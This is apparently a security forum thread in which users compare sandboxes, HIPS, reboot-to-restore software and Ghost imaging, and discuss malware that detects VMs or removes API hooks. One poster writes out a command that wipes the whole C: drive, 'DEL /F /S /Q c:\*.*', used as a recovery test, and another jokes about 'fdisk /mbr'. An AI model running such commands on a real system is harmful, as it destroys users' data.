This file is hosted by Tripod, a Lycos®Network Site, and is not available for download. Please check out Tripod's Help system for more information about Remote Loading and our Remote Loading policy.
" }-
I had to go to Peter Ferrie's home page first http://pferrie.tripod.com and then click on the Attacks on Virtual Machines v2 (slides) (http://pferrie.tripod.com/papers/attacks2.ppt) link." }-
Thanks flinchlock. I should have checked the link ;D
Fixed.
-{ Quote: "If you're interested in starting process from kernel mode then I have further info." }-
If it's possible to start a new process from kernel mode without receiving a prompt from a HIPS, then almost all HIPS and reboot-to-restore solutions will become useless.

-{ Quote: " The code behaves itself while in the VM and then causes mischief when it's on your "real" PC...

If the hook can be removed then it's goodbye to the sandbox and hello hard disc. " }-
-{ Quote: "If it's possible to start a new process from kernel mode without receiving a prompt from a HIPS, then almost all HIPS and reboot-to-restore solutions will become useless." }-Hello Lucas,

I don't see the connection between VM/sandbox and reboot-to-restore program. Anything that makes changes to the HD will be gone using a reboot-to-restore solution.

regards,

-rich

________________________________________________________________
"Talking About Security Can Lead To Anxiety, Panic, And Dread...
Or Cool Assessments, Common Sense And Practical Planning..."
--Bruce Schneier

-{ Quote: "
Here's an interesting article (8.5mb) that got me thinking about doing my own investigations into removing API hooks.

http://www.packetstormsecurity.org/hitb04/hitb04-chew-keong-tan.pdf

I think once this ideology becomes more prevalent in malware then any security tool that uses API hooking could be in trouble.

If you're interested in starting process from kernel mode then I have further info." }-
Thanks, but .. over my head;D
I mean, if it were a document, with explanations and all that, maybe. But it seems to be a presentation where: 1- lacks the presentation by the speaker, 2- assumes that i know what they are talking about, ie, he makes shortcuts from the beggining assuming who is reading already is on top of things.

I hope others can comment on it.

Hello Rich,
Reboot-to-restore software uses kernel drivers, right? If a kernel process can be started (don't know how) without prompts from the HIPS/whitelist, it may disable the kernel driver needed for the RTR (;D) software.
Do you remember our conversation about DeepFreeze? ;)

-{ Quote: "Do you remember our conversation about DeepFreeze? ;)" }-No, but you would have to demonstrate a working sample to convince me.

And, of course, how would such malware get onto my computer in the first place.

regards,

-rich

________________________________________________________________
"Talking About Security Can Lead To Anxiety, Panic, And Dread...
Or Cool Assessments, Common Sense And Practical Planning..."
--Bruce Schneier

-{ Quote: "Hello Lucas,
Anything that makes changes to the HD will be gone using a reboot-to-restore solution." }-
That's right.
Each infection has to CHANGE my harddisk to do something evil, that's their WEAKNESS and I use that weakness to kill them by removing the changes on my harddisk during each reboot. Simple but very efficient.

I wished that the change was stopped IMMEDIATELY and not during reboot, like Anti-Executable does, but that software doesn't exist yet. :)

-{ Quote: "Each infection has to CHANGE my harddisk to do something evil, that's their WEAKNESS and I use that weakness to kill them by removing the changes on my harddisk during each reboot. Simple but very efficient." }-
We're talking about the possibility of a malware to execute without warnings from HIPS (Anti-Executable in your case) which could, for example, thaw your frozen snapshot thus surviving the reboot.
At this moment, it's mostly a theoretical discussion with the possibility of some misunderstanding.
-{ Quote: "I wished that the change was stopped IMMEDIATELY and not during reboot, but that software doesn't exist yet. :) " }-
It's called Sandboxie ;D

-{ Quote: "It's called Sandboxie ;D" }-
No that's NOT Sandboxie. It's a kind of Anti-Executable, but for ALL objects, not just executables.

Well, it would be impossible to do anything. For example, the browser needs to write to the cache.

-{ Quote: "Well, it would be impossible to do anything. For example, the browser needs to write to the cache." }-
You take it all too literally, it's ALL objects with exceptions, if absolutely necessary. I only want to avoid reboots and to have an immediate reaction, not a delayed reaction.

-{ Quote: "You take it all too literally, it's ALL objects with exceptions, if absolutely necessary. I only want to avoid reboots and to have an immediate reaction, not a delayed reaction." }-
Well, then you're contradicting yourself. AE PREVENTS malware from executing at all, while a reboot-to-restore solution lets the malware execute, and then undoes the changes it does. Rmus is correct, SandboxIE would be a much more similar solution to the one you're describing than AE-for-all.

-{ Quote: "No that's NOT Sandboxie. It's a kind of Anti-Executable, but for ALL objects, not just executables." }-

Erik

You might want to look at SSM, or KAV PDM. Version 7.0 must be getting close, it is really looking good.

Pete

-{ Quote: "
As long the damage is on the harddisk and nothing more than that, then isolation works, but not in your examples.
" }-

Exactly, I didn't know how to describe it, but your substract is fine : Sandboxes can't help as soon as data stealing/remote data extraction is involved somehow.

There are some sandboxes which are taking care of that fact, for example i'm thinking about BufferZone's confidential folder (access forbidden for sandboxed processes), but it doesn't work for all datas located outside the sandbox - programs wouldn't work sandboxed, otherwise; with the LDpinch example again, I do not know any sandbox preventing the user's Windows licence serial from being read , and then possibly uploaded (:ouch: ).

As said Rmus, layered defense helps to mitigate damages (a good firewall to block outbound access/to block data upload, and why not process execution control, HIPS..), but in my example I only focused on the protection offered by the sandbox on its own.

-{ Quote: "Well, then you're contradicting yourself. AE PREVENTS malware from executing at all, while a reboot-to-restore solution lets the malware execute, and then undoes the changes it does. Rmus is correct, SandboxIE would be a much more similar solution to the one you're describing than AE-for-all." }-
No I'm not contradicting myself, you just don't see the whole picture.
My boot-to-restore does more than just removing the mistakes of my security softwares. :)

-{ Quote: "Exactly, I didn't know how to describe it, but your substract is fine : Sandboxes can't help as soon as data stealing/remote data extraction is involved somehow.

There are some sandboxes which are taking care of that fact, for example i'm thinking about BufferZone's confidential folder (access forbidden for sandboxed processes), but it doesn't work for all datas located outside the sandbox - programs wouldn't work sandboxed, otherwise; with the LDpinch example again, I do not know any sandbox preventing the user's Windows licence serial from being read , and then possibly uploaded (:ouch: ).

As said Rmus, layered defense helps to mitigate damages (a good firewall to block outbound access/to block data upload, and why not process execution control, HIPS..), but in my example I only focused on the protection offered by the sandbox on its own." }-
SandboxIE's closed file path too. You sound unfamiliar with SandboxIE ???

I thought you were thinking of XSS or similar problems with javascript, online accounts passwords, etc.

With the closed file path, sandboxed applications do not read my important files. Or do you find it not effective? (when testing)

-{ Quote: "SandboxIE's closed file path too. You sound unfamiliar with SandboxIE ???" }-

Pedro, I just used Bufferzone as an example, I didn't say it was the only one to provide that kind of protection, about restricted zone/confidential folder.

I don't know how is this protection implemented in Sandboxie (yes, I'm quite unfamiliar with it), but here too I do not think it can't prevent sandboxed process to access system infos like the XP serial number.

-{ Quote: "Why not download an evaluation version and run some tests! Old adage in one of my lines of work:

It's fine to ask for opinions and look at other's tests, but I don't think you will be satisfied until you prove for yourself what you are looking for :) " }-
I have not had time to download an evaluation version of AE.

But, I did do this: DEL /F /S /Q c:\*.*

It deleted a gazillion files (.exe, .dll, all).

I had to turn my PC off/on since the programs for reboot/shutdown were deleted.
My Partition Magic (MBR) menu came up just fine.
The FD-ISR (PBR) pre-boot menu came up just fine.
I choose "F1" and booted into my secondary snapshot just fine.
When I clicked on the systray FD-ISR icon, I got the error message: Can't open FirstDefense-ISR Manager.
I installed FD-ISR.
I clicked on the systray FD-ISR icon and it came up just fine.
I did a Copy/Update from Secondary -> Primary.
It replaced 34,596 missing files and 50 missing folders (4.26GB).
I reboot into my Primary, and all is fine
;D ;D ;D ;D ;D ;D

Mike

-{ Quote: "I have not had time to download an evaluation version of AE.

But, I did do this: DEL /F /S /Q c:\*.*

It deleted a gazillion files (.exe, .dll, all).

I had to turn my PC off/on since the programs for reboot/shutdown were deleted.
My Partition Magic (MBR) menu came up just fine.
The FD-ISR (PBR) pre-boot menu came up just fine.
I choose "F1" and booted into my secondary snapshot just fine.
When I clicked on the systray FD-ISR icon, I got the error message: Can't open FirstDefense-ISR Manager.
I installed FD-ISR.
I clicked on the systray FD-ISR icon and it came up just fine.
I did a Copy/Update from Secondary -> Primary.
It replaced 34,596 missing files and 50 missing folders (4.26GB).
I reboot into my Primary, and all is fine
;D ;D ;D ;D ;D ;D

Mike" }-
OK, but the bottom line is that PowerShadow didn't protect you against this disaster. From your description the same happened to me. My both snapshot were restored, but the FDISR-icon didn't work anymore and that means that the restore wasn't successfull.
When Anti-Executable is installed and HIGH security = ON and the setting "Delete Prevention" + "Copy Prevention" are both enabled, I wonder if it still would be a disaster. It might be possible that the restoration would be complete.
Unfortunately "Delete/Copy Prevention" = enabled are a pain for copy/update.

-{ Quote: "OK, but the bottom line is that PowerShadow didn't did protect you against this disaster." }-I guess I caused some confusion on my part. The test I did, I only had FD-ISR installed. So, it only took me about 10 minutes to be back running again.

I just did that exact same test with PS 2.8.2 in single Shadow mode (system partition only).

It "looked" like it also deleted a gazillion files, but a simple Off/On with my power button, I was back running in less than 60 seconds. All those 34,000+ files were not really deleted.;D ;D :thumb: :thumb: ;D ;D

So, both FD-ISR and PS both protected my system, except PS was about 10 times quicker!

Mike

UPDATE/FYI...

In case anyone wonders what "DEL /F /S /Q c:\*.*" does. Just go to a Command Prompt window, and type "del /?". The "/?" will display info about whatever command.

C:\TEMP>del /?
Deletes one or more files.

DEL [/P] [/F] [/S] [/Q] [/A[[:]attributes]] names
ERASE [/P] [/F] [/S] [/Q] [/A[[:]attributes]] names

names Specifies a list of one or more files or directories.
Wildcards may be used to delete multiple files. If a
directory is specified, all files within the directory
will be deleted.

/P Prompts for confirmation before deleting each file.
/F Force deleting of read-only files.
/S Delete specified files from all subdirectories.
/Q Quiet mode, do not ask if ok to delete on global wildcard
/A Selects files to delete based on attributes
attributes R Read-only files S System files
H Hidden files A Files ready for archiving
- Prefix meaning not

-{ Quote: "I guess I caused some confusion on my part. The test I did, I only had FD-ISR installed. So, it only took me about 10 minutes to be back running again.

I just did that exact same test with PS 2.8.2 in single Shadow mode (system partition only).

It "looked" like it also deleted a gazillion files, but a simple Off/On with my power button, I was back running in less than 60 seconds. All those 34,000+ files were not really deleted.;D ;D :thumb: :thumb: ;D ;D

So, both FD-ISR and PS both protected my system, except PS was about 10 times quicker!
" }-
1. FDISR didn't recover IMO, because you had to re-install FDISR in the first test.

2. PS did recover very well and very fast. FDISR was probably saved by PS in the second test.

-{ Quote: "1. FDISR didn't recover IMO, because you had to re-install FDISR in the first test." }-Well, of course you are right, but, it was still a lot quicker than a 30 minute Ghost image restore. Also, it was a very simple task to just reinstall FD-ISR.

-{ Quote: "2. PS did recover very well and very fast. FDISR was probably saved by PS in the second test." }-Yes and yes and yes

Mike

-{ Quote: "Well, of course you are right, but, it was still a lot quicker than a 30 minute Ghost image restore.
Mike" }-
Can restore a ghost image in around a minute here.A thinned out XP pro with my maintenance, needed exes and security apps are the only things on C.

Not trying to be a smart a#*, just showing what can be done.:)
190150

I cover any snapshot i happen to choose from my collection of (7) with the excellent protection of Power Shadow

Kinda like ErikAlbert's famous boot-to-restore method ;D

Not had a single problem and don't expect any. I see nothing at all wrong with FD-ISR freezestorage.arx routine except it's considerably longer to carry out whereas with PS, it's reboot ONCE and everything flushed & restored like new again.

That takes only as long as it takes your PC to reboot. Ya gotta love entering Shadow-Mode on-the-fly. LoL

-{ Quote: "Can restore a ghost image in around a minute here.A thinned out XP pro with my maintenance, needed exes and security apps are the only things on C.

Not trying to be a smart a#*, just showing what can be done.:)" }-Please more details (probably in a new thread... please... please... *puppy* *puppy*

Is that your normal working image, or just a special emergency type image?

Mike

Don't think it warrants a new thread so just a quick rundown.

This 160 gig drive.Install XP pro,Perfect Disk, Norton Ghost and Partition Magic on C.

Make 3 partitions which vary depending on the size of the disc.

C drive of 5 - 8 gig.
E drive of 20 gig for ghost images and D is around 130 gig for Virtual Machines, pics, music, flics and general crap.

After the partitions are made I defrag then make a ghost image.

Then I go about tweaking and slimming down XP using Bold Fortune's guide but I usually only delete the mainly larger useless folders or their contents.

Make another ghost image and then go about installing my other needed apps such as Ccleaner, Firefox, MS Officie 2003 - Word, Excel and PPS, Sandboxie, Powershadow and few other litle apps that I find handy.

Defrag and make another ghost image.

At this stage the install of XP along my needed apps is around a gig of data and ghost images are around the 500 meg mark.

I also make an image every week or so but I always keep the first one of a fresh install of XP.

Also drop a clone of C and D on a partitioned slave drive and unhook it.

This is really just a brief summary of what I get up to, bit of work but great after it's set up.

As you can see from the pic below I have 18 ghost images on E and still have 10 gig of 20 free.
190160

What is your Ghost parameters? (Mine are "-fdsz -z1")

Do you exclude a 2,145,386,496 byte pagefile.sys?

Mike

With a gig of ddr I run with no paging without any slowdowns or probs.

I didn't think that Norton Ghost backed up the pagefile???

Ghost 2003 is used here.
190161

Here is my Ghost image... pagefile.sys.

I think I will try no pagefile since I have about 1.5GB of RAM.

I will PM you if I have any more Ghost questions before a MOD does a "fdisk /mbr" on us!

Thanks, Mike

-{ Quote: "Here is my Ghost image... pagefile.sys.

I think I will try no pagefile since I have about 1.5GB of RAM.

I will PM you if I have any more Ghost questions before a MOD does a "fdisk /mbr" on us!

Thanks, Mike" }-

Start another thread in Software and services. Your questions and the answers could help others.

Pete

-{ Quote: "
I will PM you if I have any more Ghost questions before a MOD does a "fdisk /mbr" on us!
" }-
Yep, good idea Mike.;D

I have been thinking that if someone could come up with something like VM Player that could load ghost images into virtual environment and discard any changes at shutdown, now that would be something.

Way too complicated for me as I couldn't even work out Winhex to find those hidden lines.:-\

-{ Quote: "Yep, good idea Mike.;D

I have been thinking that if someone could come up with something like VM Player that could load ghost images into virtual environment and discard any changes at shutdown, now that would be something.

Way too complicated for me as I couldn't even work out Winhex to find those hidden lines.:-\" }-
Well you can use vmware converter to copy your system to a vm which you can then run with vmware player. However i've found the free version of vmware player doesn't allow you to revert changes made, only the paid version does apparently.

Thanks for that farmerlee.
Using MS Virtual PC 2007 here.Got myself thinking about trying to restore a ghost image to a virtual machine.

Made a ghost backup cd and it booted within the vitual machine and seemed to do a restore as per normal.

Reboots into the "Start Windows Normally, Safemode... etc screen" and just sits there after hitting enter at any selection.

Tried the fixboot, fixmbr and chkdsk /r/f commands to no avail.

Booted with a BartPE disk and it seems all the XP files are in the virtual machine so I am probably missing something simple at this stage.

Even if I can't get it to boot it's a good learning experience.:wacko:

Come to think of it the virtual machine may use generic drivers so this could be the prob.:ouch:

VMWare and Ghost (http://www.vmware.com/pdf/p2v_thirdpartyimage.pdf)

edit : VMWare Converter may become of interest also.

Thanks for that Meriadoc and have saved the pdf for future reference.

Playing with MS Virtual PC 2007 ATM but have heard VMware is the way to go.

Well I finally got the restored ghost image to boot but I cheated.

Done a repair install with the xp cd with all my apps staying intact but I still had to thin out xp, turn off services and redo tweaks.

Yep ghost and other symantec are compatable and for awhile.

cheated?

-{ Quote: "
Playing with MS Virtual PC 2007 ATM but have heard VMware is the way to go.
" }-
If money is not a problem, VMware is indeed the way to go. :)
http://www.vmware.com/request_processor?nextPage=/vmwarestore/newstore/category_ace.jsp&action=CATALOG.GETGROUPS&application=store&fromACEPage=true&ProductGroupCodes=ACE2-ENT,ACE2-ALACARTE,ACE2-PIS,ACE2-MEDIAKIT

-{ Quote: "If money is not a problem, VMware is indeed the way to go. :)
http://www.vmware.com/request_processor?nextPage=/vmwarestore/newstore/category_ace.jsp&action=CATALOG.GETGROUPS&application=store&fromACEPage=true&ProductGroupCodes=ACE2-ENT,ACE2-ALACARTE,ACE2-PIS,ACE2-MEDIAKIT" }-

I concur. VMware Workstation is very powerful.

Indeed alot of money, if you scroll down abit you'll find Workstation 6 + ACE Option Pack ($189) which is what I upgraded to at home.

-{ Quote: "I concur. VMware Workstation is very powerful." }-I have no experience with VMware, but I read someplace in one of the 10,000,000 posts I have read (just this) month, something about some malware can detect a VM type setup, and not unload until running back in the real system. ???

Mike

-{ Quote: "I have no experience with VMware, but I read someplace in one of the 10,000,000 posts I have read (just this) month, something about some malware can detect a VM type setup, and not unload until running back in the real system. ???

Mike" }-
From what i remember certain malware can detect a vm and stay dormant until it gets onto a real system.

-{ Quote: "Indeed alot of money, if you scroll down abit you'll find Workstation 6 + ACE Option Pack ($189) which is what I upgraded to at home." }-
Yikes $189! I think i'll stick with virtual pc for now :)

-{ Quote: "Thanks for that farmerlee.
Using MS Virtual PC 2007 here.Got myself thinking about trying to restore a ghost image to a virtual machine.

Made a ghost backup cd and it booted within the vitual machine and seemed to do a restore as per normal.

Reboots into the "Start Windows Normally, Safemode... etc screen" and just sits there after hitting enter at any selection.

Tried the fixboot, fixmbr and chkdsk /r/f commands to no avail.

Booted with a BartPE disk and it seems all the XP files are in the virtual machine so I am probably missing something simple at this stage.

Even if I can't get it to boot it's a good learning experience.:wacko:

Come to think of it the virtual machine may use generic drivers so this could be the prob.:ouch:" }-
Yeah i think one of the main problems with using an image in a vm is that the hardware emulated within the vm is usually different from the system that the image was taken from.

Malware authors can easily use code to make their code behave while running under a VM. Please see -> http://www.honeynet.org/papers/bots/botnet-code.html

There is a shorter technique to detect VMWare and Virtual PC but both are as effective.

~interact